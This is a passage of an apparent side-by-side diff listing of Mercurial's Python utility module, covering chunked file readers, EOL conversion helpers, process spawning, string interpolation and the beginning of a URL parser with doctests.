2418 class chunkbuffer(object):
2416 class chunkbuffer(object):
2419 """Allow arbitrary sized chunks of data to be efficiently read from an
2417 """Allow arbitrary sized chunks of data to be efficiently read from an
2420 iterator over chunks of arbitrary size."""
2418 iterator over chunks of arbitrary size."""
2421
2419
2422 def __init__(self, in_iter):
2420 def __init__(self, in_iter):
2423 """in_iter is the iterator that's iterating over the input chunks."""
2421 """in_iter is the iterator that's iterating over the input chunks."""
2424 def splitbig(chunks):
2422 def splitbig(chunks):
2425 for chunk in chunks:
2423 for chunk in chunks:
2426 if len(chunk) > 2**20:
2424 if len(chunk) > 2**20:
2427 pos = 0
2425 pos = 0
2428 while pos < len(chunk):
2426 while pos < len(chunk):
2429 end = pos + 2 ** 18
2427 end = pos + 2 ** 18
2430 yield chunk[pos:end]
2428 yield chunk[pos:end]
2431 pos = end
2429 pos = end
2432 else:
2430 else:
2433 yield chunk
2431 yield chunk
2434 self.iter = splitbig(in_iter)
2432 self.iter = splitbig(in_iter)
2435 self._queue = collections.deque()
2433 self._queue = collections.deque()
2436 self._chunkoffset = 0
2434 self._chunkoffset = 0
2437
2435
2438 def read(self, l=None):
2436 def read(self, l=None):
2439 """Read L bytes of data from the iterator of chunks of data.
2437 """Read L bytes of data from the iterator of chunks of data.
2440 Returns less than L bytes if the iterator runs dry.
2438 Returns less than L bytes if the iterator runs dry.
2441
2439
2442 If size parameter is omitted, read everything"""
2440 If size parameter is omitted, read everything"""
2443 if l is None:
2441 if l is None:
2444 return ''.join(self.iter)
2442 return ''.join(self.iter)
2445
2443
2446 left = l
2444 left = l
2447 buf = []
2445 buf = []
2448 queue = self._queue
2446 queue = self._queue
2449 while left > 0:
2447 while left > 0:
2450 # refill the queue
2448 # refill the queue
2451 if not queue:
2449 if not queue:
2452 target = 2**18
2450 target = 2**18
2453 for chunk in self.iter:
2451 for chunk in self.iter:
2454 queue.append(chunk)
2452 queue.append(chunk)
2455 target -= len(chunk)
2453 target -= len(chunk)
2456 if target <= 0:
2454 if target <= 0:
2457 break
2455 break
2458 if not queue:
2456 if not queue:
2459 break
2457 break
2460
2458
2461 # The easy way to do this would be to queue.popleft(), modify the
2459 # The easy way to do this would be to queue.popleft(), modify the
2462 # chunk (if necessary), then queue.appendleft(). However, for cases
2460 # chunk (if necessary), then queue.appendleft(). However, for cases
2463 # where we read partial chunk content, this incurs 2 dequeue
2461 # where we read partial chunk content, this incurs 2 dequeue
2464 # mutations and creates a new str for the remaining chunk in the
2462 # mutations and creates a new str for the remaining chunk in the
2465 # queue. Our code below avoids this overhead.
2463 # queue. Our code below avoids this overhead.
2466
2464
2467 chunk = queue[0]
2465 chunk = queue[0]
2468 chunkl = len(chunk)
2466 chunkl = len(chunk)
2469 offset = self._chunkoffset
2467 offset = self._chunkoffset
2470
2468
2471 # Use full chunk.
2469 # Use full chunk.
2472 if offset == 0 and left >= chunkl:
2470 if offset == 0 and left >= chunkl:
2473 left -= chunkl
2471 left -= chunkl
2474 queue.popleft()
2472 queue.popleft()
2475 buf.append(chunk)
2473 buf.append(chunk)
2476 # self._chunkoffset remains at 0.
2474 # self._chunkoffset remains at 0.
2477 continue
2475 continue
2478
2476
2479 chunkremaining = chunkl - offset
2477 chunkremaining = chunkl - offset
2480
2478
2481 # Use all of unconsumed part of chunk.
2479 # Use all of unconsumed part of chunk.
2482 if left >= chunkremaining:
2480 if left >= chunkremaining:
2483 left -= chunkremaining
2481 left -= chunkremaining
2484 queue.popleft()
2482 queue.popleft()
2485 # offset == 0 is enabled by block above, so this won't merely
2483 # offset == 0 is enabled by block above, so this won't merely
2486 # copy via ``chunk[0:]``.
2484 # copy via ``chunk[0:]``.
2487 buf.append(chunk[offset:])
2485 buf.append(chunk[offset:])
2488 self._chunkoffset = 0
2486 self._chunkoffset = 0
2489
2487
2490 # Partial chunk needed.
2488 # Partial chunk needed.
2491 else:
2489 else:
2492 buf.append(chunk[offset:offset + left])
2490 buf.append(chunk[offset:offset + left])
2493 self._chunkoffset += left
2491 self._chunkoffset += left
2494 left -= chunkremaining
2492 left -= chunkremaining
2495
2493
2496 return ''.join(buf)
2494 return ''.join(buf)
2497
2495
2498 def filechunkiter(f, size=131072, limit=None):
2496 def filechunkiter(f, size=131072, limit=None):
2499 """Create a generator that produces the data in the file size
2497 """Create a generator that produces the data in the file size
2500 (default 131072) bytes at a time, up to optional limit (default is
2498 (default 131072) bytes at a time, up to optional limit (default is
2501 to read all data). Chunks may be less than size bytes if the
2499 to read all data). Chunks may be less than size bytes if the
2502 chunk is the last chunk in the file, or the file is a socket or
2500 chunk is the last chunk in the file, or the file is a socket or
2503 some other type of file that sometimes reads less data than is
2501 some other type of file that sometimes reads less data than is
2504 requested."""
2502 requested."""
2505 assert size >= 0
2503 assert size >= 0
2506 assert limit is None or limit >= 0
2504 assert limit is None or limit >= 0
2507 while True:
2505 while True:
2508 if limit is None:
2506 if limit is None:
2509 nbytes = size
2507 nbytes = size
2510 else:
2508 else:
2511 nbytes = min(limit, size)
2509 nbytes = min(limit, size)
2512 s = nbytes and f.read(nbytes)
2510 s = nbytes and f.read(nbytes)
2513 if not s:
2511 if not s:
2514 break
2512 break
2515 if limit:
2513 if limit:
2516 limit -= len(s)
2514 limit -= len(s)
2517 yield s
2515 yield s
2518
2516
2519 class cappedreader(object):
2517 class cappedreader(object):
2520 """A file object proxy that allows reading up to N bytes.
2518 """A file object proxy that allows reading up to N bytes.
2521
2519
2522 Given a source file object, instances of this type allow reading up to
2520 Given a source file object, instances of this type allow reading up to
2523 N bytes from that source file object. Attempts to read past the allowed
2521 N bytes from that source file object. Attempts to read past the allowed
2524 limit are treated as EOF.
2522 limit are treated as EOF.
2525
2523
2526 It is assumed that I/O is not performed on the original file object
2524 It is assumed that I/O is not performed on the original file object
2527 in addition to I/O that is performed by this instance. If there is,
2525 in addition to I/O that is performed by this instance. If there is,
2528 state tracking will get out of sync and unexpected results will ensue.
2526 state tracking will get out of sync and unexpected results will ensue.
2529 """
2527 """
2530 def __init__(self, fh, limit):
2528 def __init__(self, fh, limit):
2531 """Allow reading up to <limit> bytes from <fh>."""
2529 """Allow reading up to <limit> bytes from <fh>."""
2532 self._fh = fh
2530 self._fh = fh
2533 self._left = limit
2531 self._left = limit
2534
2532
2535 def read(self, n=-1):
2533 def read(self, n=-1):
2536 if not self._left:
2534 if not self._left:
2537 return b''
2535 return b''
2538
2536
2539 if n < 0:
2537 if n < 0:
2540 n = self._left
2538 n = self._left
2541
2539
2542 data = self._fh.read(min(n, self._left))
2540 data = self._fh.read(min(n, self._left))
2543 self._left -= len(data)
2541 self._left -= len(data)
2544 assert self._left >= 0
2542 assert self._left >= 0
2545
2543
2546 return data
2544 return data
2547
2545
2548 def readinto(self, b):
2546 def readinto(self, b):
2549 res = self.read(len(b))
2547 res = self.read(len(b))
2550 if res is None:
2548 if res is None:
2551 return None
2549 return None
2552
2550
2553 b[0:len(res)] = res
2551 b[0:len(res)] = res
2554 return len(res)
2552 return len(res)
2555
2553
2556 def unitcountfn(*unittable):
2554 def unitcountfn(*unittable):
2557 '''return a function that renders a readable count of some quantity'''
2555 '''return a function that renders a readable count of some quantity'''
2558
2556
2559 def go(count):
2557 def go(count):
2560 for multiplier, divisor, format in unittable:
2558 for multiplier, divisor, format in unittable:
2561 if abs(count) >= divisor * multiplier:
2559 if abs(count) >= divisor * multiplier:
2562 return format % (count / float(divisor))
2560 return format % (count / float(divisor))
2563 return unittable[-1][2] % count
2561 return unittable[-1][2] % count
2564
2562
2565 return go
2563 return go
2566
2564
2567 def processlinerange(fromline, toline):
2565 def processlinerange(fromline, toline):
2568 """Check that linerange <fromline>:<toline> makes sense and return a
2566 """Check that linerange <fromline>:<toline> makes sense and return a
2569 0-based range.
2567 0-based range.
2570
2568
2571 >>> processlinerange(10, 20)
2569 >>> processlinerange(10, 20)
2572 (9, 20)
2570 (9, 20)
2573 >>> processlinerange(2, 1)
2571 >>> processlinerange(2, 1)
2574 Traceback (most recent call last):
2572 Traceback (most recent call last):
2575 ...
2573 ...
2576 ParseError: line range must be positive
2574 ParseError: line range must be positive
2577 >>> processlinerange(0, 5)
2575 >>> processlinerange(0, 5)
2578 Traceback (most recent call last):
2576 Traceback (most recent call last):
2579 ...
2577 ...
2580 ParseError: fromline must be strictly positive
2578 ParseError: fromline must be strictly positive
2581 """
2579 """
2582 if toline - fromline < 0:
2580 if toline - fromline < 0:
2583 raise error.ParseError(_("line range must be positive"))
2581 raise error.ParseError(_("line range must be positive"))
2584 if fromline < 1:
2582 if fromline < 1:
2585 raise error.ParseError(_("fromline must be strictly positive"))
2583 raise error.ParseError(_("fromline must be strictly positive"))
2586 return fromline - 1, toline
2584 return fromline - 1, toline
2587
2585
2588 bytecount = unitcountfn(
2586 bytecount = unitcountfn(
2589 (100, 1 << 30, _('%.0f GB')),
2587 (100, 1 << 30, _('%.0f GB')),
2590 (10, 1 << 30, _('%.1f GB')),
2588 (10, 1 << 30, _('%.1f GB')),
2591 (1, 1 << 30, _('%.2f GB')),
2589 (1, 1 << 30, _('%.2f GB')),
2592 (100, 1 << 20, _('%.0f MB')),
2590 (100, 1 << 20, _('%.0f MB')),
2593 (10, 1 << 20, _('%.1f MB')),
2591 (10, 1 << 20, _('%.1f MB')),
2594 (1, 1 << 20, _('%.2f MB')),
2592 (1, 1 << 20, _('%.2f MB')),
2595 (100, 1 << 10, _('%.0f KB')),
2593 (100, 1 << 10, _('%.0f KB')),
2596 (10, 1 << 10, _('%.1f KB')),
2594 (10, 1 << 10, _('%.1f KB')),
2597 (1, 1 << 10, _('%.2f KB')),
2595 (1, 1 << 10, _('%.2f KB')),
2598 (1, 1, _('%.0f bytes')),
2596 (1, 1, _('%.0f bytes')),
2599 )
2597 )
2600
2598
2601 class transformingwriter(object):
2599 class transformingwriter(object):
2602 """Writable file wrapper to transform data by function"""
2600 """Writable file wrapper to transform data by function"""
2603
2601
2604 def __init__(self, fp, encode):
2602 def __init__(self, fp, encode):
2605 self._fp = fp
2603 self._fp = fp
2606 self._encode = encode
2604 self._encode = encode
2607
2605
2608 def close(self):
2606 def close(self):
2609 self._fp.close()
2607 self._fp.close()
2610
2608
2611 def flush(self):
2609 def flush(self):
2612 self._fp.flush()
2610 self._fp.flush()
2613
2611
2614 def write(self, data):
2612 def write(self, data):
2615 return self._fp.write(self._encode(data))
2613 return self._fp.write(self._encode(data))
2616
2614
2617 # Matches a single EOL which can either be a CRLF where repeated CR
2615 # Matches a single EOL which can either be a CRLF where repeated CR
2618 # are removed or a LF. We do not care about old Macintosh files, so a
2616 # are removed or a LF. We do not care about old Macintosh files, so a
2619 # stray CR is an error.
2617 # stray CR is an error.
2620 _eolre = remod.compile(br'\r*\n')
2618 _eolre = remod.compile(br'\r*\n')
2621
2619
2622 def tolf(s):
2620 def tolf(s):
2623 return _eolre.sub('\n', s)
2621 return _eolre.sub('\n', s)
2624
2622
2625 def tocrlf(s):
2623 def tocrlf(s):
2626 return _eolre.sub('\r\n', s)
2624 return _eolre.sub('\r\n', s)
2627
2625
2628 def _crlfwriter(fp):
2626 def _crlfwriter(fp):
2629 return transformingwriter(fp, tocrlf)
2627 return transformingwriter(fp, tocrlf)
2630
2628
2631 if pycompat.oslinesep == '\r\n':
2629 if pycompat.oslinesep == '\r\n':
2632 tonativeeol = tocrlf
2630 tonativeeol = tocrlf
2633 fromnativeeol = tolf
2631 fromnativeeol = tolf
2634 nativeeolwriter = _crlfwriter
2632 nativeeolwriter = _crlfwriter
2635 else:
2633 else:
2636 tonativeeol = pycompat.identity
2634 tonativeeol = pycompat.identity
2637 fromnativeeol = pycompat.identity
2635 fromnativeeol = pycompat.identity
2638 nativeeolwriter = pycompat.identity
2636 nativeeolwriter = pycompat.identity
2639
2637
2640 if (pyplatform.python_implementation() == 'CPython' and
2638 if (pyplatform.python_implementation() == 'CPython' and
2641 sys.version_info < (3, 0)):
2639 sys.version_info < (3, 0)):
2642 # There is an issue in CPython that some IO methods do not handle EINTR
2640 # There is an issue in CPython that some IO methods do not handle EINTR
2643 # correctly. The following table shows what CPython version (and functions)
2641 # correctly. The following table shows what CPython version (and functions)
2644 # are affected (buggy: has the EINTR bug, okay: otherwise):
2642 # are affected (buggy: has the EINTR bug, okay: otherwise):
2645 #
2643 #
2646 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2644 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2647 # --------------------------------------------------
2645 # --------------------------------------------------
2648 # fp.__iter__ | buggy | buggy | okay
2646 # fp.__iter__ | buggy | buggy | okay
2649 # fp.read* | buggy | okay [1] | okay
2647 # fp.read* | buggy | okay [1] | okay
2650 #
2648 #
2651 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2649 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2652 #
2650 #
2653 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2651 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2654 # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
2652 # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
2655 #
2653 #
2656 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2654 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2657 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2655 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2658 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2656 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2659 # fp.__iter__ but not other fp.read* methods.
2657 # fp.__iter__ but not other fp.read* methods.
2660 #
2658 #
2661 # On modern systems like Linux, the "read" syscall cannot be interrupted
2659 # On modern systems like Linux, the "read" syscall cannot be interrupted
2662 # when reading "fast" files like on-disk files. So the EINTR issue only
2660 # when reading "fast" files like on-disk files. So the EINTR issue only
2663 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2661 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2664 # files approximately as "fast" files and use the fast (unsafe) code path,
2662 # files approximately as "fast" files and use the fast (unsafe) code path,
2665 # to minimize the performance impact.
2663 # to minimize the performance impact.
2666 if sys.version_info >= (2, 7, 4):
2664 if sys.version_info >= (2, 7, 4):
2667 # fp.readline deals with EINTR correctly, use it as a workaround.
2665 # fp.readline deals with EINTR correctly, use it as a workaround.
2668 def _safeiterfile(fp):
2666 def _safeiterfile(fp):
2669 return iter(fp.readline, '')
2667 return iter(fp.readline, '')
2670 else:
2668 else:
2671 # fp.read* are broken too, manually deal with EINTR in a stupid way.
2669 # fp.read* are broken too, manually deal with EINTR in a stupid way.
2672 # note: this may block longer than necessary because of bufsize.
2670 # note: this may block longer than necessary because of bufsize.
2673 def _safeiterfile(fp, bufsize=4096):
2671 def _safeiterfile(fp, bufsize=4096):
2674 fd = fp.fileno()
2672 fd = fp.fileno()
2675 line = ''
2673 line = ''
2676 while True:
2674 while True:
2677 try:
2675 try:
2678 buf = os.read(fd, bufsize)
2676 buf = os.read(fd, bufsize)
2679 except OSError as ex:
2677 except OSError as ex:
2680 # os.read only raises EINTR before any data is read
2678 # os.read only raises EINTR before any data is read
2681 if ex.errno == errno.EINTR:
2679 if ex.errno == errno.EINTR:
2682 continue
2680 continue
2683 else:
2681 else:
2684 raise
2682 raise
2685 line += buf
2683 line += buf
2686 if '\n' in buf:
2684 if '\n' in buf:
2687 splitted = line.splitlines(True)
2685 splitted = line.splitlines(True)
2688 line = ''
2686 line = ''
2689 for l in splitted:
2687 for l in splitted:
2690 if l[-1] == '\n':
2688 if l[-1] == '\n':
2691 yield l
2689 yield l
2692 else:
2690 else:
2693 line = l
2691 line = l
2694 if not buf:
2692 if not buf:
2695 break
2693 break
2696 if line:
2694 if line:
2697 yield line
2695 yield line
2698
2696
2699 def iterfile(fp):
2697 def iterfile(fp):
2700 fastpath = True
2698 fastpath = True
2701 if type(fp) is file:
2699 if type(fp) is file:
2702 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2700 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2703 if fastpath:
2701 if fastpath:
2704 return fp
2702 return fp
2705 else:
2703 else:
2706 return _safeiterfile(fp)
2704 return _safeiterfile(fp)
2707 else:
2705 else:
2708 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2706 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2709 def iterfile(fp):
2707 def iterfile(fp):
2710 return fp
2708 return fp
2711
2709
2712 def iterlines(iterator):
2710 def iterlines(iterator):
2713 for chunk in iterator:
2711 for chunk in iterator:
2714 for line in chunk.splitlines():
2712 for line in chunk.splitlines():
2715 yield line
2713 yield line
2716
2714
2717 def expandpath(path):
2715 def expandpath(path):
2718 return os.path.expanduser(os.path.expandvars(path))
2716 return os.path.expanduser(os.path.expandvars(path))
2719
2717
2720 def hgcmd():
2718 def hgcmd():
2721 """Return the command used to execute current hg
2719 """Return the command used to execute current hg
2722
2720
2723 This is different from hgexecutable() because on Windows we want
2721 This is different from hgexecutable() because on Windows we want
2724 to avoid things opening new shell windows like batch files, so we
2722 to avoid things opening new shell windows like batch files, so we
2725 get either the python call or current executable.
2723 get either the python call or current executable.
2726 """
2724 """
2727 if mainfrozen():
2725 if mainfrozen():
2728 if getattr(sys, 'frozen', None) == 'macosx_app':
2726 if getattr(sys, 'frozen', None) == 'macosx_app':
2729 # Env variable set by py2app
2727 # Env variable set by py2app
2730 return [encoding.environ['EXECUTABLEPATH']]
2728 return [encoding.environ['EXECUTABLEPATH']]
2731 else:
2729 else:
2732 return [pycompat.sysexecutable]
2730 return [pycompat.sysexecutable]
2733 return gethgcmd()
2731 return gethgcmd()
2734
2732
2735 def rundetached(args, condfn):
2733 def rundetached(args, condfn):
2736 """Execute the argument list in a detached process.
2734 """Execute the argument list in a detached process.
2737
2735
2738 condfn is a callable which is called repeatedly and should return
2736 condfn is a callable which is called repeatedly and should return
2739 True once the child process is known to have started successfully.
2737 True once the child process is known to have started successfully.
2740 At this point, the child process PID is returned. If the child
2738 At this point, the child process PID is returned. If the child
2741 process fails to start or finishes before condfn() evaluates to
2739 process fails to start or finishes before condfn() evaluates to
2742 True, return -1.
2740 True, return -1.
2743 """
2741 """
2744 # Windows case is easier because the child process is either
2742 # Windows case is easier because the child process is either
2745 # successfully starting and validating the condition or exiting
2743 # successfully starting and validating the condition or exiting
2746 # on failure. We just poll on its PID. On Unix, if the child
2744 # on failure. We just poll on its PID. On Unix, if the child
2747 # process fails to start, it will be left in a zombie state until
2745 # process fails to start, it will be left in a zombie state until
2748 # the parent wait on it, which we cannot do since we expect a long
2746 # the parent wait on it, which we cannot do since we expect a long
2749 # running process on success. Instead we listen for SIGCHLD telling
2747 # running process on success. Instead we listen for SIGCHLD telling
2750 # us our child process terminated.
2748 # us our child process terminated.
2751 terminated = set()
2749 terminated = set()
2752 def handler(signum, frame):
2750 def handler(signum, frame):
2753 terminated.add(os.wait())
2751 terminated.add(os.wait())
2754 prevhandler = None
2752 prevhandler = None
2755 SIGCHLD = getattr(signal, 'SIGCHLD', None)
2753 SIGCHLD = getattr(signal, 'SIGCHLD', None)
2756 if SIGCHLD is not None:
2754 if SIGCHLD is not None:
2757 prevhandler = signal.signal(SIGCHLD, handler)
2755 prevhandler = signal.signal(SIGCHLD, handler)
2758 try:
2756 try:
2759 pid = spawndetached(args)
2757 pid = spawndetached(args)
2760 while not condfn():
2758 while not condfn():
2761 if ((pid in terminated or not testpid(pid))
2759 if ((pid in terminated or not testpid(pid))
2762 and not condfn()):
2760 and not condfn()):
2763 return -1
2761 return -1
2764 time.sleep(0.1)
2762 time.sleep(0.1)
2765 return pid
2763 return pid
2766 finally:
2764 finally:
2767 if prevhandler is not None:
2765 if prevhandler is not None:
2768 signal.signal(signal.SIGCHLD, prevhandler)
2766 signal.signal(signal.SIGCHLD, prevhandler)
2769
2767
2770 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2768 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2771 """Return the result of interpolating items in the mapping into string s.
2769 """Return the result of interpolating items in the mapping into string s.
2772
2770
2773 prefix is a single character string, or a two character string with
2771 prefix is a single character string, or a two character string with
2774 a backslash as the first character if the prefix needs to be escaped in
2772 a backslash as the first character if the prefix needs to be escaped in
2775 a regular expression.
2773 a regular expression.
2776
2774
2777 fn is an optional function that will be applied to the replacement text
2775 fn is an optional function that will be applied to the replacement text
2778 just before replacement.
2776 just before replacement.
2779
2777
2780 escape_prefix is an optional flag that allows using doubled prefix for
2778 escape_prefix is an optional flag that allows using doubled prefix for
2781 its escaping.
2779 its escaping.
2782 """
2780 """
2783 fn = fn or (lambda s: s)
2781 fn = fn or (lambda s: s)
2784 patterns = '|'.join(mapping.keys())
2782 patterns = '|'.join(mapping.keys())
2785 if escape_prefix:
2783 if escape_prefix:
2786 patterns += '|' + prefix
2784 patterns += '|' + prefix
2787 if len(prefix) > 1:
2785 if len(prefix) > 1:
2788 prefix_char = prefix[1:]
2786 prefix_char = prefix[1:]
2789 else:
2787 else:
2790 prefix_char = prefix
2788 prefix_char = prefix
2791 mapping[prefix_char] = prefix_char
2789 mapping[prefix_char] = prefix_char
2792 r = remod.compile(br'%s(%s)' % (prefix, patterns))
2790 r = remod.compile(br'%s(%s)' % (prefix, patterns))
2793 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2791 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2794
2792
2795 def getport(port):
2793 def getport(port):
2796 """Return the port for a given network service.
2794 """Return the port for a given network service.
2797
2795
2798 If port is an integer, it's returned as is. If it's a string, it's
2796 If port is an integer, it's returned as is. If it's a string, it's
2799 looked up using socket.getservbyname(). If there's no matching
2797 looked up using socket.getservbyname(). If there's no matching
2800 service, error.Abort is raised.
2798 service, error.Abort is raised.
2801 """
2799 """
2802 try:
2800 try:
2803 return int(port)
2801 return int(port)
2804 except ValueError:
2802 except ValueError:
2805 pass
2803 pass
2806
2804
2807 try:
2805 try:
2808 return socket.getservbyname(pycompat.sysstr(port))
2806 return socket.getservbyname(pycompat.sysstr(port))
2809 except socket.error:
2807 except socket.error:
2810 raise error.Abort(_("no port number associated with service '%s'")
2808 raise error.Abort(_("no port number associated with service '%s'")
2811 % port)
2809 % port)
2812
2810
2813 class url(object):
2811 class url(object):
2814 r"""Reliable URL parser.
2812 r"""Reliable URL parser.
2815
2813
2816 This parses URLs and provides attributes for the following
2814 This parses URLs and provides attributes for the following
2817 components:
2815 components:
2818
2816
2819 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2817 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2820
2818
2821 Missing components are set to None. The only exception is
2819 Missing components are set to None. The only exception is
2822 fragment, which is set to '' if present but empty.
2820 fragment, which is set to '' if present but empty.
2823
2821
2824 If parsefragment is False, fragment is included in query. If
2822 If parsefragment is False, fragment is included in query. If
2825 parsequery is False, query is included in path. If both are
2823 parsequery is False, query is included in path. If both are
2826 False, both fragment and query are included in path.
2824 False, both fragment and query are included in path.
2827
2825
2828 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2826 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2829
2827
2830 Note that for backward compatibility reasons, bundle URLs do not
2828 Note that for backward compatibility reasons, bundle URLs do not
2831 take host names. That means 'bundle://../' has a path of '../'.
2829 take host names. That means 'bundle://../' has a path of '../'.
2832
2830
2833 Examples:
2831 Examples:
2834
2832
2835 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2833 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2836 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2834 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2837 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2835 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2838 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2836 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2839 >>> url(b'file:///home/joe/repo')
2837 >>> url(b'file:///home/joe/repo')
2840 <url scheme: 'file', path: '/home/joe/repo'>
2838 <url scheme: 'file', path: '/home/joe/repo'>
2841 >>> url(b'file:///c:/temp/foo/')
2839 >>> url(b'file:///c:/temp/foo/')
2842 <url scheme: 'file', path: 'c:/temp/foo/'>
2840 <url scheme: 'file', path: 'c:/temp/foo/'>
2843 >>> url(b'bundle:foo')
2841 >>> url(b'bundle:foo')
2844 <url scheme: 'bundle', path: 'foo'>
2842 <url scheme: 'bundle', path: 'foo'>
2845 >>> url(b'bundle://../foo')
2843 >>> url(b'bundle://../foo')
2846 <url scheme: 'bundle', path: '../foo'>
2844 <url scheme: 'bundle', path: '../foo'>
2847 >>> url(br'c:\foo\bar')
2845 >>> url(br'c:\foo\bar')
2848 <url path: 'c:\\foo\\bar'>
2846 <url path: 'c:\\foo\\bar'>
2849 >>> url(br'\\blah\blah\blah')
2847 >>> url(br'\\blah\blah\blah')
2850 <url path: '\\\\blah\\blah\\blah'>
2848 <url path: '\\\\blah\\blah\\blah'>
2851 >>> url(br'\\blah\blah\blah#baz')
2849 >>> url(br'\\blah\blah\blah#baz')
2852 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2850 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2853 >>> url(br'file:///C:\users\me')
2851 >>> url(br'file:///C:\users\me')
2854 <url scheme: 'file', path: 'C:\\users\\me'>
2852 <url scheme: 'file', path: 'C:\\users\\me'>
2855
2853
2856 Authentication credentials:
2854 Authentication credentials:
2857
2855
2858 >>> url(b'ssh://joe:xyz@x/repo')
2856 >>> url(b'ssh://joe:xyz@x/repo')
2859 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2857 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2860 >>> url(b'ssh://joe@x/repo')
2858 >>> url(b'ssh://joe@x/repo')
2861 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2859 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2862
2860
2863 Query strings and fragments:
2861 Query strings and fragments:
2864
2862
2865 >>> url(b'http://host/a?b#c')
2863 >>> url(b'http://host/a?b#c')
2866 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2864 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2867 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
2865 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
2868 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2866 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2869
2867
2870 Empty path:
2868 Empty path:
2871
2869
2872 >>> url(b'')
2870 >>> url(b'')
2873 <url path: ''>
2871 <url path: ''>
2874 >>> url(b'#a')
2872 >>> url(b'#a')
2875 <url path: '', fragment: 'a'>
2873 <url path: '', fragment: 'a'>
2876 >>> url(b'http://host/')
2874 >>> url(b'http://host/')
2877 <url scheme: 'http', host: 'host', path: ''>
2875 <url scheme: 'http', host: 'host', path: ''>
2878 >>> url(b'http://host/#a')
2876 >>> url(b'http://host/#a')
2879 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
2877 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
2880
2878
2881 Only scheme:
2879 Only scheme:
2882
2880
2883 >>> url(b'http:')
2881 >>> url(b'http:')
2884 <url scheme: 'http'>
2882 <url scheme: 'http'>
2885 """
2883 """
2886
2884
2887 _safechars = "!~*'()+"
2885 _safechars = "!~*'()+"
2888 _safepchars = "/!~*'()+:\\"
2886 _safepchars = "/!~*'()+:\\"
2889 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
2887 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
2890
2888
2891 def __init__(self, path, parsequery=True, parsefragment=True):
2889 def __init__(self, path, parsequery=True, parsefragment=True):
2892 # We slowly chomp away at path until we have only the path left
2890 # We slowly chomp away at path until we have only the path left
2893 self.scheme = self.user = self.passwd = self.host = None
2891 self.scheme = self.user = self.passwd = self.host = None
2894 self.port = self.path = self.query = self.fragment = None
2892 self.port = self.path = self.query = self.fragment = None
2895 self._localpath = True
2893 self._localpath = True
2896 self._hostport = ''
2894 self._hostport = ''
2897 self._origpath = path
2895 self._origpath = path
2898
2896
2899 if parsefragment and '#' in path:
2897 if parsefragment and '#' in path:
2900 path, self.fragment = path.split('#', 1)
2898 path, self.fragment = path.split('#', 1)
2901
2899
2902 # special case for Windows drive letters and UNC paths
2900 # special case for Windows drive letters and UNC paths
2903 if hasdriveletter(path) or path.startswith('\\\\'):
2901 if hasdriveletter(path) or path.startswith('\\\\'):
2904 self.path = path
2902 self.path = path
2905 return
2903 return
2906
2904
2907 # For compatibility reasons, we can't handle bundle paths as
2905 # For compatibility reasons, we can't handle bundle paths as
2908 # normal URLS
2906 # normal URLS
2909 if path.startswith('bundle:'):
2907 if path.startswith('bundle:'):
2910 self.scheme = 'bundle'
2908 self.scheme = 'bundle'
2911 path = path[7:]
2909 path = path[7:]
2912 if path.startswith('//'):
2910 if path.startswith('//'):
2913 path = path[2:]
2911 path = path[2:]
2914 self.path = path
2912 self.path = path
2915 return
2913 return
2916
2914
2917 if self._matchscheme(path):
2915 if self._matchscheme(path):
2918 parts = path.split(':', 1)
2916 parts = path.split(':', 1)
2919 if parts[0]:
2917 if parts[0]:
2920 self.scheme, path = parts
2918 self.scheme, path = parts
2921 self._localpath = False
